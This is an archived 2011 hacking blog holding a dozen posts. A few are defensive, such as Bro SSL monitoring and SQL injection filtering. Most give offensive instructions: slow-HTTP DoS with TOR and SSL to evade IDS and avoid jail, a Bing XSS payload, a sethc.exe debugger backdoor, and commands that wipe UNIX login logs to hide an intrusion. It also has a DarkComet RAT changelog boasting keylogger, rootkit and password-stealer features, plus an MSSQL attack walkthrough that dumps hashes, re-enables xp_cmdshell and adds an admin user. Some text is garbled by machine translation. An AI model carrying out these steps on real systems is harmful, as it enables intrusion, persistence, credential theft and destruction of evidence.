Aug 26, 2011

Monitoring SSL Connections with Bro: Quickstart


Bro ( is an amazing suite of software which can do things that no other IDS on the planet can come close to.  In this post, I want to cover one such feature: SSL monitoring.  Bro has a true understanding of the SSL being used on your network and will efficiently process certificates on the wire for a variety of purposes.  Out of the box, Bro can very efficiently and accurately identify invalid and self-signed certificates, going so far as to actually walk the certificate chain using the certs that ship with Mozilla browsers for a true test.  In addition, Bro will extract all of the relevant details from certificates for logging purposes, which can provide a handy historical record of the sites and companies involved in SSL, which is the next best thing to performing proxy/MITM SSL inspection.

Installing Bro
This quickstart guide will show how to get up and running with Bro on Ubuntu.  I hope that most of the commands and tips will apply to other operating systems and Linux distros, but there will surely be some differences.

Begin by making sure we've got our prerequisites in order:
apt-get install git libssl-dev swig libmagic-dev libgeoip-dev
Grab the latest Bro from the git repository.  Beware, this is cutting edge code, and you may need to download the latest stable tarball from if the git build fails:
git clone --recursive git://
Now you will have bro and auxiliary files in a directory named "bro."
cd bro
I have discovered that on some Linux distros (SuSE, for one), the version of CMake is less than  2.6.3 and so it needs to be downloaded from and custom installed as Bro requires 2.6.3 or better.
(edited: "--enable-brov6" apparently has memory leaks right now.)
./configure --prefix=/usr/local/bro-git
There are a fair amount of options here, but the configure script does a pretty good job of finding out if you've got things installed already and adjusting accordingly.  Since we're looking to do SSL inspection, at a minimum, you'll need to make sure you've got the OpenSSL development libraries installed, which we've done above with apt-get.  If all goes, well, we do the make:
make && cd build && sudo make install
Now we will add a custom bro script which Seth Hall wrote which will print to STDOUT any SSL certificates which were created less than 30 days ago.
cd /usr/local/bro-git/share/bro/site/
vi young-ssl.bro
Paste in the following (edited: removed "@load protocols/ssl"):
event SSL::log_ssl(rec: SSL::Info)
       # We have to check if there is a not_valid_before field because not
       # all SSL transactions actually exchange certificates (i.e. resumed session).
       if ( rec?$not_valid_before && rec$not_valid_before >= network_time() - 30 days &&
            rec$not_valid_before <= network_time() )
               print fmt("%s is using a certificate that just became valid in the last 30 days (%T) (%s)",
                       rec$id$resp_h, rec$not_valid_before, rec$subject);
Now we activate it in the config:
echo "@load young-ssl" >> local.bro
Create some basic log directories for a test run:
mkdir /tmp/bro-logs
cd /tmp/bro-logs
Start bro (assuming we want to monitor eth1):
sudo /usr/local/bro-git/bin/bro -i eth1 local
Let it run for awhile, then have a look at the various logs created.  ssl.log will contain a list of all SSL certificates observed.  Here's an example:

# ts    uid    id.orig_h    id.orig_p    id.resp_h    id.resp_p    version    cipher    server_name    subject    not_valid_before    not_valid_after    validation_status
1313897881.475569    QUVGS5xx9ea    36804    443    TLSv10    TLS_DHE_RSA_WITH_AES_256_CBC_SHA,OU=Twitter Platform,O=Twitter\, Inc.,L=San Francisco,ST=California,C=US    1274158800.000000    1337317199.000000    ok

So there you have it!  A fully functional Bro installation in just a few easy steps.  In a future post, I will show you have to get Bro output into various output collection mechanism like syslog and databases.


If you like my blog, Please Donate Me

Aug 25, 2011

Apache DoS

A previously unknown flaw in the code for processing byte range headers allows version 2.2.x of the Apache Web Server to be crippled from a single PC. A suitable "Apache Killer" Perl script that impressively demonstrates the problem has already been published on the Full Disclosure mailing list. The tool sends GET requests with multiple "byte ranges" that will claim large portions of the system's memory space. A "byte range" statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.
No official patch has been released, but a functional workaround is to use rewrite rules that only allow a single range request in GET and HEAD headers. This should not present a problem for most applications. To enable the rules, administrators must load the Apache Web Server's mod_rewrite module.
Another suggested workaround is to use the mod_header module with the RequestHeader unset Range configuration to completely delete any range requests that may be contained in a header. However, this approach is likely to cause more problems than restricting the number of ranges. Admins should use the tool to test the effectiveness of their measures before others do it for them.

If you like my blog, Please Donate Me
One Dollar $1.00

Aug 24, 2011

The Rise of the Slow Denial of Service

Usually when you think about Denial of Service attacks nowadays, most people think up images of the Anonymous kids running their copy of LOIC in a hivemind or Russian Gangsters building a botnet to run an online protection racket.  Now there is a new-ish type of attack technique floating around which I believe will become more important over the next year or two: the slow http attacks. Refs:
How Slow DOS Works
Webservers run an interesting version of process management.  When you start an Apache server, it starts a master process that spawns a number of listener processes (or threads) as defined by StartServers (5-10 is a good starting number).  Each listener serves a number of requests, defined by MaxRequestsPerChild (1000 is a good number here), and then dies to be replaced by another process/thread by the master server.  This is done so that if there are any applications that leak memory, they won’t hang.  As more requests are received, more processes/threads are spawned up to the MaxClients setting.  MaxClients is designed to throttle the number of processes so that Apache doesn’t forkbomb and the OS become unmanageable because it’s thrashing to swap.  There are also some rules for weaning off idle processes but those are immaterial to what we’re trying to do today.
Go read my previous post on Apache tuning and stress testing for the background on server pool management.
What happens in a slow DOS is that the attack tools sends an HTTP request that never finishes.  As a result, each listener process never finishes its quota of MaxRequestsPerChild so that it can die.  By sending a small amount of never-complete requests, Apache gladly spawns new processes/threads up to MaxClients at which point it fails to answer requests and the site is DOS’ed.  The higher the rate of listener process turnover, the faster the server stops answering requests.  For a poorly tuned webserver configuration with MaxClients set too high, the server starts thrashing to swap before it hits MaxClients and to top it off, the server is unresponsive even to ssh connections and needs a hard boot.
The beauty of this is that the theoretical minimum number of requests to make a server hang for a well-tuned Apache is equal to MaxClients.  This attack can also take out web boundary devices: reverse proxies, Web Application Firewalls, Load Balancers, Content Switches, and anything else that receives HTTP(S).

Advantages to Slow DOS Attacks
There are a couple of reasons why slow DOS tools are getting research and development this year and I see them growing in popularity.
  • Speed and Simplicity:  Slow DOS attacks are quick to take down a server.  One attacker can take down a website without trying to build a botnet or cooordinate attack times and targets with 3000 college students and young professionals.
  • TOR:  With volume-based attacks like the Low Orbit Ion Cannon, it doesn’t make sense to route attack traffic through TOR.  TOR adds latency, throttles the amount of requests that the attacker can send, and might eventually fail before the target’s network does.  Using TOR keeps the defender from tracking you back to your real location.
  • Server Logging: Because the request is never completed, most servers don’t make a log.  This makes it very hard to detect or troubleshoot which means it takes longer to mitigate.  I’m interested in exceptions if you know specifics on which webserver/tool combinations make webtraffic logs.
  • IDS Evasion: Most DOS tools are volume-based attack.  There are IDS rules to detect these: usually by counting the number of TCP SYN traffic coming from each IP address in a particular span of time and flagging the traffic when a threshold is exceeded.  By using a slow DOS tool that sends requests via SSL, IDS has no idea that you’re sending it slow DOS traffic.
  • Stay out of the “Crowbar Hotel”:  Use the Ion Cannon, make logs on the target system, go to jail.  Use slow DOS with TOR and SSL, leave less traces, avoid having friends that will trade you for a pack of cigarettes.
This part is fun, and by that I mean “it sucks”.  There are some things that help, but there isn’t a single solution that makes the problem go away.
  • Know how to detect it.  This is the hard one.  What you’re looking for is Apache spawned out to MaxClients but not logging a comparative volume of traffic.  IE, the servers are hung up waiting for that one last request to finish and shucking all other requests.
    • “ps aux | grep apache2 | grep start | wc -l” is equal to MaxClients +2.
    • Your webserver isn’t logging the normal amount of requests.  Use some grep-foo and “wc -l” to compare traffic from: a month ago, a day ago, an hour ago, and the last 5 minutes.
  • Disable POST as a method if you don’t need it.  Some of the more advanced techniques rely on the fact that POST can contain more headers and more body data.
  • Use an astronomically high number of servers.  If your server processes can timeout and respawn faster than the slow DOS can hang them, you win.  If you had maybe 3000 servers, you wouldn’t have to worry about this.  Don’t have 3000 servers, I might have some you could use.
  • Set a lower connection timeout.  Something like 15-30 seconds will keep Apache humming along.
  • Limit the request size.  1500 bytes is pretty small, 3K is a pretty good value to set.  Note that this needs testing, it will break some things.
  • Block TOR exit nodes before the traffic reaches your webservers (IE, at layer 3/4).  TOR has a list of these.

If you like my blog, Please Donate Me
One Dollar $1.00

Howto: FHTTP + Shodan = Proxy List: P

Hunting with Shodan proxy list and FHTTP

First we need to add support for shodan:

modules are downloaded into the folder FHTTP and that's the whole installation.

We also have an example using this form: 20 -% 20Shodan/

Let's use this script.

But first let us explain a little operation, not the module shodan, the script.


  my $ shodan shodan =-> new (); 
  $ Shodan-> login ($ user, $ password); 

as such do not need to log in, but we do so for more results (more than 1 page).

and look:

  my @ tmpenlaces = $ shodan-> search ($ search, $ page); 

$ Page is the page number that we want to return.

  ($ Proto, $ host, $ hostheader, $ path, $ port) = & tools: parseurl ($ link); 
  $ Sock = IO:: Socket:: INET-> new (PeerAddr => $ host, 
  PeerPort => $ port, 
  Timeout => 1, 
  Proto => 'tcp'); 
  if ($ sock) { 
  $ I = 2; 
  $ Down + +; 

Parse links and put up a socket, if that fails we recorded as "fallen."

  $ Maketunnel = tools:: maketunnel ($ sock, $ hosttest, $ porttest, 0.0); 

Note: The last two values ​​are: debug (0 or 1) and version (HTTP version)

We try to create an HTTP tunnel (using "CONNECT"), does everything automatic tools for us ;)...
$ Maketunnel think will be 1 if successful, 0 if not and 2 if there is a 404 (that is taking as GET and CONNECT can be a honneypot: P).

Otherwise close the socket, we get down to that level is used to test a normal proxy.

  $ Packet = http-> new ("GET", "http://". $ Hosttest. (($ Port! = 80)? (":".$ Port): 1.1 "")."/"," "); 
  $ Package-> agregarencabezados (0, @ headers); 
  my% resp = $ packet-> send ($ host, $ port); 

We use the Request Generator ( and finally the rest is up to check the headers / contents and determine whether the proxy correctly made the connection (for that argument is used regex).

Now playing ...

  linux-7nli: / # perl home/xianur0/fhttp-v1.3 squid "" "" 80 Google 
  Checking Dependencies ... 
  Congratulations: FHTTP working 100%! 
  Tunnel: 80 
  Target: 9 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [!] Proxy HTTP: xx 
  [X] Can not create tunnel: HTTP/1.0 400 Bad Request! 
  [X] Can not create tunnel: HTTP/1.0 400 Bad Request! 
  [!] Proxy HTTP: xxx 
  [X] Can not create tunnel: HTTP/1.1 501 Not Implemented! 
  [X] Can not create tunnel: HTTP/1.1 501 Not Implemented! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [!] Proxy HTTP: xxx 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [!] Proxy HTTP: xxx 
  [X] Can not create tunnel: HTTP/1.0 407 Proxy Authentication Required! 
  [X] Can not create tunnel: HTTP/1.0 407 Proxy Authentication Required! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [!] Proxy HTTP: xxx 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [!] Proxy HTTP: xxx 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [X] Can not create tunnel: HTTP/1.0 403 Forbidden! 
  [!] Proxy HTTP: xxx 
  Down: 1 
  Honeypot: 0 
  Others: 7 


If you like my blog, Please Donate Me
One Dollar $1.00


Information -------------------- 
Name : XSS Reflected on BING.COM 
Software : BING.COM MAPS 
Vendor Homepage : 
Vulnerability Type : XSS Reflected 
Severity : Very High 
Researcher : Juan Sacco (runlvl) <jsacco [at] insecurityresearch [dot] com> 

Description ------------------ 
BING.COM is prone to a XSS vulnerability because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the victim's browser. 

Details ------------------- 
The reflected XSS vulnerability is a variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is exectued by the browser, and then displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read Exploit example as follow ----------------------------- 
?v=2 &cp=-34.59999847400003~-58.45000076200001 
alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//</SCRIPT> &form=LMLTEW The vulnerability is caused by the following code and affected by the Generate Code map <div id="LME_mapLinks" style="line-height: 20px"> <a id="LME_largerMap" //--&gt;&quot;&gt;'&gt; on Bing Maps (New window)">View Larger Map</a> </div> 

Solution ------------------- 
No patch are available at this time. 

Credits ------------------- 
Manual discovered by Insecurity Research Labs Juan Sacco (runlvl) -

If you like my blog, Please Donate Me
One Dollar $1.00

Aug 23, 2011

sethc.exe and Getting a SYSTEM Level Prompt Outside of Login

sethc.exe is a program that controls some of your accessibility options. By default in Windows there are several ways to launch it. Left Alt+Left Shift+Print Screen is my favorite way to launch it. (TRY IT)

Now something you may notice, in order for disabled people to be able to log in, they need to be able to use this key shortcut to read the login prompt. When done from the login window, winlogon.exe launches sethc.exe which does its stuff.

So, what does this mean? Well, winlogon.exe just launches whatever is named sethc.exe, it doesn't care what executable it *actually* is, so we can just replace sethc.exe with cmd.exe and that will do the trick. But this has a downside. We are corrupting our installation of Windows, and if Windows notices that sethc.exe isn't really sethc.exe then the jig is up! We need a better way.

Enter our better way.

Windows has a key in the registry called Image File Execution Options. This key does... stuff. One of the many things it does is allows for a per executable specific debugger. The thing is, it doesn't actually check if the executable is actually a debugger, it just launches it instead. Malware use this key as one of the ways to launch themselves. We're going to use it for a different purpose.

Create a key under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options. Name it sethc.exe. Under sethc.exe make a new REG_SZ (string) value, name it Debugger. Edit the value to be "C:\windows\system32\cmd.exe"

  • Log out,
  • Left Alt + Left Shift + Print Screen
  • ????
  • Profit!

Now, one word to the wise, after a set amount of time, that command prompt will automatically close, it will be killed by winlogon.exe. You can avoid that by suspending the winlogon.exe process, but that's typically a bad idea. Just know what you want to do using your cmd prompt. And do it quickly is best. :)

This is useful is you cannot log in to your computer, and you want to fix it.

If you like my blog, Please Donate Me

Aug 22, 2011

Privileges Escalation in Windows 7 with 2 command lines.

As we all know, Microsoft Windows have this passion for running background services.
Most of those services are running under a greatly privileged account called SYSTEM.

If you have administrative permission on a Windows 7 (as well as Windows XP, Windows Vista...) - you are allowed to change the behavior of those services.
If you put together A and B, you'll see where this is working out.
My friend Mathias Karlsson showed me a nifty way of doing that, using only two commands in cmd.
The trick is to use the task scheduler (windows crontabs) in order to execute arbitrarily commands on demand.
The result is the very same as the "runas-interactive-exploit" for Microsoft Windows XP (hence the title).

So here it goes! A proof-of-concept!
  1. Run the batch.
  2. Get prompted by windows.
  3. Press: "View the message".
  4. Login!
  5. Press "Return now" when you're done - in order to return to your regular account.
Download the PoC here.

If you like my blog, Please Donate Me
One Dollar $1.00

Cover Your Tracks After Hacking A UNIX Box

In the Monitoring User Login post, the commands and files that are related in tracking user activities are discussed.
Here are some ways of covering your fingerprints on a server using the files that monitors user logins.
We want to erase any trace that will show that we were inside the box. In doing so we’ll just:
cat /dev/null > <file>
Lastlog file
Clear out the last log file if you’re using an existing user from the box. Lastlogin file shows when and where a particular user last login from.
login: razile

Last login: Fri Oct 21 21:50:02 2007 from
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
razile@unix-box %
Erase that if you don’t want the admin see where you last login from (IP, hostname, time etc)
cat /dev/null > /var/adm/lastlogin
After clearing the lastlog file, comparing the first login and the second one:
(first login)
Last login: Thu Nov  1 21:33:41 2007 from
Sun Microsystems Inc.   SunOS 5.9       Generic May 2002
(after deletion)
 Sun Microsystems Inc.   SunOS 5.9       Generic May 2002
bash: unalias: `e’: not an alias
wtmpx/tmpx files
If you want to check those users who logged in to a Unix box, type in ‘last’
UnixBox# last | more
root        pts/21    Sat Nov  3 11:38   still logged in
sitescp   pts/20  Sat Nov  3 07:00   still logged in
root        pts/23    Sat Nov  3 05:05   still logged in
root        pts/22    Sat Nov  3 05:05   still logged in
paladel    pts/22     Fri Nov  2 14:33 – 15:32  (00:59)
boy1        pts/26     Fri Nov  2 13:22 – 14:50  (01:28)
boy2        pts/26     Fri Nov  2 13:20 – 13:22  (00:02)
You’ll see the user who was logged in, the terminal used, the IP where he came from the date or duration of his activity in the server.
That is a lot of information, so in covering up your track, delete or zero out the files that stores these information
cat /dev/null > /var/adm/wtmpx
cat /dev/null > /var/adm/tmpx
After doing so, you’ll get this when doing ‘last’
# cat /dev/null > /var/adm/wtmpx
# last | more

wtmp begins Sun Nov  4 00:41
You could also zero out the /var/adm/messages if you’re really paranoid.
Of course doing these is like shouting and telling the whole universe that you were there.
These are just a few to cover you track… Do you have any additions? Or any tips in covering the intrusion without knowing that you were there?


If you like my blog, Please Donate Me
One Dollar $1.00

SQL injections, what they are, how they work and how to filter

I found this great tutorial from my twitter about "What's the SQL Injection and How it works?" and I cut some part that I want to note to this post. So if you want to see full detail, please go to the Source.

Today, SQL injections are nothing new, but there are still many developers who know, the very last week I argued with an acquaintance, a well-known developer, which not only unaware of this vulnerability, but also other as XSS, XPath injection, Blind, and so on. Unfortunately, the fact that the informal sector partner is an isolated incident, and so certified by the last update of the document generated by SANS and MITRE, where he analyzed the 25 most dangerous programming errors committed by the developers:
The paper commented that the XSS top the list of common mistakes, followed immediately by the second SQL Injection. So it seems that still there is not much awareness of the issue do not you think?
As would a scenario like the following, which assumes that the system has an administrator named "Carlos" with password "123ABC."

Imagine now that we have in the PHP authentication page the following query to retrieve the users will try to match the username and password provided by the user:
  query = "SELECT * FROM T_usuarios WHERE name = '". $ username.  "'And password ='". $ PasswordUsuario.  "'"; 
Where username and passwordUsuario variables contain the value in the following textbox introducito:
  name="form1" id="Form1" action="login.php"> <form method="post"
 User: <input type="text" name="user" id="user">
 Pass: <input type="password" name="pass" id="pass">
 <input type="submit" value="Log name="aceptar" in">
 </ Form> 
Now let a malicious user inserts the value in each box below the textbox:
  'Or '1' = '1 
The following occurs:

Words, the query would be as follows:
  query = "SELECT * FROM T_usuarios WHERE name = '' or '1 '= '1' and password = '' or '1 '= '1'; 
The following statement 'or '1' = '1 'is reversing the earlier ruling by the operator "or", and giving power to the following statement, which is indicating a decision to be always true, 1 is equal to 1. The same goes for the password.
In summary, we select all users from the table "T_usuarios" If your name is empty or equal to 1 = 1, and as the second statement is true always, return ALL users of the DB. Is that correct it?
So if our authentication system in PHP code is as simple as the following (where it does not matter the type of user), we will have crept into the system:
  $ Query = "SELECT * FROM WHERE name T_usuarios ='".( $ user)." 'AND password $ pass )."'"; ='".(
 $ Result = mysql_query ($ query);
 if (mysql_fetch_row ($ result))
 $ _SESSION ['Logged'] = 1;
Now take another case, imagine that the developer "is left-handed" and likes to "set things left" =)
  query = "SELECT * FROM WHERE T_usuarios. '" $ username.  "'And name ='". $ PasswordUsuario.  "'= Password"; 
For the same way we try to disable the equalities of the username variable to the column name and column variable passwrord passwordUsuario with the following query:
  1 '= '1' or ' 
Another interesting and very instructive example is the following. Imagine that a user puts the user in the box and everything in the box of the password the following query:
  something '; T_usuarios DROP TABLE, SELECT password FROM T_clientes WHERE name =' Carlos 
But not all SQL injections are the quotes, we imagine that we have the following query:
  query = "SELECT * FROM WHERE id = T_usuarios."  $ UserId; 
The programmer is assuming that the variable $ userId will contain an integer with the id of a user. But someone could insert something like the following:
  1 or '1 '= '1' 
Running the following query:
  query = "SELECT * FROM WHERE id = 1 T_usuarios or '1 '= '1'"; 
That is, all users would be selected IF IF id = 1 or 1 = 1, and as the second sentence is true, it returns all users in the DB.

A standard way for all languages ​​validate the solution would ALWAYS input and parameterized SQL statements, so that pieces of code inserted by the users are not interpreted as code, if not only taken as the type of data (numbers or letters) that we expect the user to enter. If for example we want the user to enter an ID number, could "cast" which assigns the variable text box with a textbox (int) in order to verify that you can not get text.
For example, in the case of PHP and MySQL, as we proposed @ zipus would use the following function, which prepends backslashes to the following characters to avoid injection: \ x00, \ n \ r \ ' "and \ X1:
  mysql_real_escape_string ($ variable) 
Leaving the query as follows:
  $ Query = "SELECT * FROM T_usuarios WHERE name = '". Mysql_real_escape_string ($ user). "' AND password = '". Mysql_real_escape_string ($ pass )."'"; 
A while ago, until PHP 5.3.0 if I remember correctly, there was a feature called magic quotes, which was responsible for putting in front of the single and double quotes a backslash to avoid the shot. This operation was automatic, without calling any functions, so it was not necessary to manually call the function addslashes () to a backslash to quote. However, there has been much loved this feature, because if you behave the PHP application to another server with another magic quotes configuration can have problems. Conversely, if you control the quotes manually with addslashes () and slides the application to a server with magic quotes might be cases that before a quote is verifications two backslashes, which could make you save a data in the DB as \ '.
So a more standard way of filtering could be next, blocking the damage may be caused by magic quotes:
  function filter ($ variable)
     / / This will withdraw if the bars if magic quotes are enabled
     if (get_magic_quotes_gpc ()) {
         $ Var = stripslashes ($ variable);
     if (is_numeric ($ variable)) {
         $ Variable = "'."  mysql_real_escape_string ($ variable).  "'";
     return $ variable;
NOTE: returns 1 if get_magic_quotes_gpc magic_quotes are enabled and 0 if not. If they are enabled, it automatically places a backslash \ before a single quote, double quote, null, and so on. That is, if after we did a mysql_real_escape_string, we would be putting two slashes \ \ before the stretchers single, double, null, and so on. Therefore we use the function stripslashes () to remove the first backslash that may have put magic_quotes, so it will only put the mysql_real_escape_string ().
We would be the query as follows:
  $ Query = "SELECT * FROM T_usuarios WHERE name = '". Filter ($ user). "' AND password = '". Filter ($ pass )."'"; 

If you like my blog, Please Donate Me
One Dollar $1.00

DarkComet-RAT v.4.0(fix1) Was Release

DarkComet-RAT v4.0 Change log
- DarkComet-RAT is now compiled on Delphi XE instead of Delphi 2010.
- Synthax highlighter added in remote keylogger.
- Multithreading is now more efficient, no more freezing, using a new powerfull and stable methode (still using pure Win32 API both side for it)
- Get hard drive information added in file manager
- Bot logs in main form had change, it is more efficient / fast and user friendly
- Whole system parser is now far stable and faster
- No-IP was moded and is now better ;)
- All global settings were redisigned in a new form that will contain all necessary stuff for Client side
- Flags manager has been ported to the main client settings form
- Now you can change the default size Width and Height of the users thumbnails
- No more menu in the top of the SIN (Main Window - Users list...) so it is more clear
- The [+] button is one of the way to add a new port to listen else go to Socket/Net button to manage em all
- More options added in main tray icon (right click to display them)
- Skin system added in DarkComet in settings > Client Layount (for people that like templates - Most XP users)
- A new system of mass data saving had been added, sqlite local database system added (comet.db store all mass data) << don't delete this file ! - A complex and stable group manager been added in the users list (very strong) syncrhonized with the local database. - Now all users are stored and updated in local database - Webcam is now far more stable using now DirectX (DirectShow lib dumped from Microsoft by M.Braun) - As most crypters got the runPE function, it was removed in DarkComet then it is more easy to crypted for newbies - Little bug fixed in remote desktop - Mass downloader in control center was improved, a big bug was fixed - Keylogger GUI had change a little - New toast design - edit server now recognize encrypted profiles than normal ones. - few bugs in file listing fixed in file manager - New keylogger system, now all logs are divided by date [Months-Year] > [Day name] > full date file. so now it is more easy to find what you want to find.
- All logs are synchronized with the local database, that means if the remote gui delete the logs no problems it will be there synchronized with the DB :)
- Online keylogger is now separate from the offline one.
- last arrival logs (latest ones) will be display with a text icon and and eye on it.
- new rootkit function added in edit server (server shield) it hide the file from explorer even if show hidden files is on it will be also hidden from DIR command of MSDOS
- same rootkit function for parent dir
- Multipassword capture added, when you selected more than 1 users in the list and choose quick function password it will dump all selected users password.
- Wallpaper changer in file manager works fine now with .bmp and .jpg files for sure (not tested GIF) but PNG seems to not work.
- More components are double buffered now, so less blinking stuff on mouse move.
- List ports / services icons are better now
- UpNP exe drops now in temporary file then it wont anoy you and now it works all the time
- Save settings are better synchronized now (ini read/write)
- Now geoflag in users list aren't using the darkcomet-rat site database but a local GeoIP database then it is far more fast and stable. (do not delete GeoIP.dat !!)
- New search user system, very very strong and complete u will love it :D
- DC_UUID is now more perfmant using the computer HWID (Harware ID) + Default drive Serial (Like for my other software Vertex)
- Auto start desktop capture added in settings
- Auto start webcam capture added in settings
- Auto start sound capture added in settings
- A new super sexy about made don't forget to take a look to it ;)
- Some notification added in file manager to know if actions was well done !
- new info added in computer info ( now the rat determine if remote computer id a laptop or desktop computer) if laptop it gives the battery charge status with icon :)
- Now you can preview any files in file manager by paquet of 1Ko then you don't need to download a 30Mo text file to see it :)
- A fantastic bookmark system for the file manager, like firefox when you click on the gray star it will turn to colors and add the current path to bookmarks and of course synchronized with local database :D
- Stub use less memory now, garbage colector is better now
- [ADDED] Miranda MSN Messenger password stealer
- Download thumnail (filemanager) bug fixed
- To avoid problems when you build many time a module to test edit server functions part by part when you build a module it will re generate a random mutex


If you like my blog, Please Donate Me
One Dollar $1.00

JonDoFox - Anonymous and secure web surfing.

JonDoFox anonymous and secure web surfing

Anonymous Surfing

JonDoFox is a profile for the Mozilla Firefox web browser particularly optimized for anonymous and secure web surfing. For anonymous surfing you need an IP changer proxy too. We recommended our proxy tool JonDo but you may use other anonymsation services like Tor Onion Router. 


If you like my blog, Please Donate Me
One Dollar $1.00

Pentesting MS SQL Server with SQLat, and Cain.

Ok, by now you probably now how much I enjoy hacking, ehm, ehm…sorry!, pentesting. Well for this tutorial I will be pentesting MS SQL Server with SQLat, Freetds, and Cain. Database store and provide access to information and information is power. Sensitive data such as bank account numbers, credit reports, and lots of other important information can be obtained from an insecure database, in this tutorial I will try to explain basic technology about MSSQL, like default install as well as demonstrate tools and techniques that can be use to exploit MSSQL server.
Important facts about MS SQL Server:
1- Ms SQL server users
SQL server creates the sa account, the system administrator of the SQL server instance and database owner(DBO) of all the databases on the SQL Server. The sa account is a login account that is mapped to the sysadmin role for the SQL server system. It is also the DBO for all the databases. This account by default is granted all privileges and permissions on the database and it can execute commands as SYSTEM on the server.
You can configure SQL server user authentication to use Windows credentials only or in combination with named SQL server login IDs and passwords, which is known as mixed mode authentication. Once the user is created this user can authenticate to the database and begin to operate within the bounds of his permissions and roles
2- Stored Procedures.
Stored Procedures are pieces of code written in Transact_SQL(T-SQL) that are compiled upon use. An example of a useful stored procedure is the sp_addlogin, which is used to create a new user. Extended Stored Procedures are similar to stored procedures except the contain dynamic link librareies(DLLs). Extended stored procedures run in the SQL server process space and are meant to extend the functionality of the database. One extended stored procedure useful to pentesters is the xp_cmdshell which allows the user to execute commands in a shell on the windows operating system. As you can see stores procedures also can create significant vulnerabilities in a database.
3- Communication.
After Database is installed user must be able to connect to the application to use it. TCP and UDP ports are associated with each database application, ports can be changed but for this tutorial I’m going to assume the defaults. By default SQL server uses port 1433 for connections to the database. As mentioned earlier this port can be changed but often it is not…also UDP port 1434 is the SQL server listener service that lets clients to browse the associated database instances installed on the server.
The Tools in action:
SQL auditing tools(SQLat) is a toolkit created by Patrik Karlsson for Microsoft SQL server penetration test. SQLat contains various tools to perform dictionary attacks and analysis; upload files, read the windows registry and dump the security account manager(SAM) database using pwdump. it also can be use to restore the xp_cmdshell extended stored procedure, if it has been removed and the DLL is still present on the system.
here are some of the utilities that come with SQLat and I will be using in this tutorial.
SQLat tools and utilities:
sqldict performs dictionary attacks against SQL server
sqlanlz creates a http report containing an analysis of the databases
sqlquery interactive command line SQL query tool
Once you have the target in sight, you can begin by using sqldict which will perform a dictionary attack against the victim, you have to provide the lists of users and passwords files. You can see in the next figure.
Once you have privilege access to the SQL server, you should proceed to obtain and crack the passwords hashes, this newly obtained accounts could give you access to other machines on the network as administrators often use same passwords in more than one machine, and the use of imaging software like Ghost replicate exacts copies of the entire machine along with the administrator passwords. MS SQL server 2000 stores its passwords in the master database, passwords hashes are generated using the psdencrypt() function in the form of Salted Secure Hash algorithm in the sysxlogins table.
You can retrieve username, and hashes from MS SQL servers database using the following T-SQL statement.
SELECT name, password FROM master..sysxlogins

Next we query the SQL server database for username and password stored in the sysxlogins table as shown in the next figure.
You can also retrieve username and password information from MS SQL 2005 using one of the following T-SQL statement.
SELECT name, password FROM sys.sql_logins
SELECT name, cast (password as varbinary(256)) FROM sys.syslogins
Next we dump the username and hashes into cain, for that we launch cain and go to the cracker tab and click MS SQL Hashes, and select the plus sing at the top, to insert the hashes. Before actually inserting the hashes into cain we have to break it into acceptable format.
The next figure shows the hashes already imported into cain…
Once the hashes have been imported you can right click and select either dictionary or brute force attack…
Obtaining access to the host operating System.
Now that we’ve obtained sysadmin privileges to the MSSQL server, we will try to get access to the local operating system using xp_cmdshell extended stored procedure. The xp_cmdshell is stored in the master database and allows you to issue commands directly to the operating system using T-SQL queries. Sometimes administrators will disable this extended stored procedure, in MSSQL 2000, and in MSSQL 2005 is disabled by default; you can use the following SQL queries to enable it back.
sp_addextededproc ‘xp_cmdshell’,'xp_log70.dll’
EXEC master..sp_configure ‘show advance options’, 1
EXEC master..sp_configure ‘xp_cmdshell’, 1
EXEC master..sp_configure ‘show advance options’, 0
Next we use the xp_cmdshell extended stored procedure to with SQLat’s sqlquery to create a user “hack” with password “password”…
Adding the newly created user to the administrators localgroup…
Next we will try to dump the hashes for the local administrator account for that we fire up tftpd on the local machine to transfer pwdump to our target machine user the xp_cmdshell E-stored procedure.
Once we’ve download pwdump to the target machine we dump the hashes, and later crack them using john or cain….
Once you have cracked the hashes make sure to use them throughout the target’s environment Windows as well as MSSQL server


If you like my blog, Please Donate Me
One Dollar $1.00




 Please subscribe my blog.

 Old Subscribe

Share |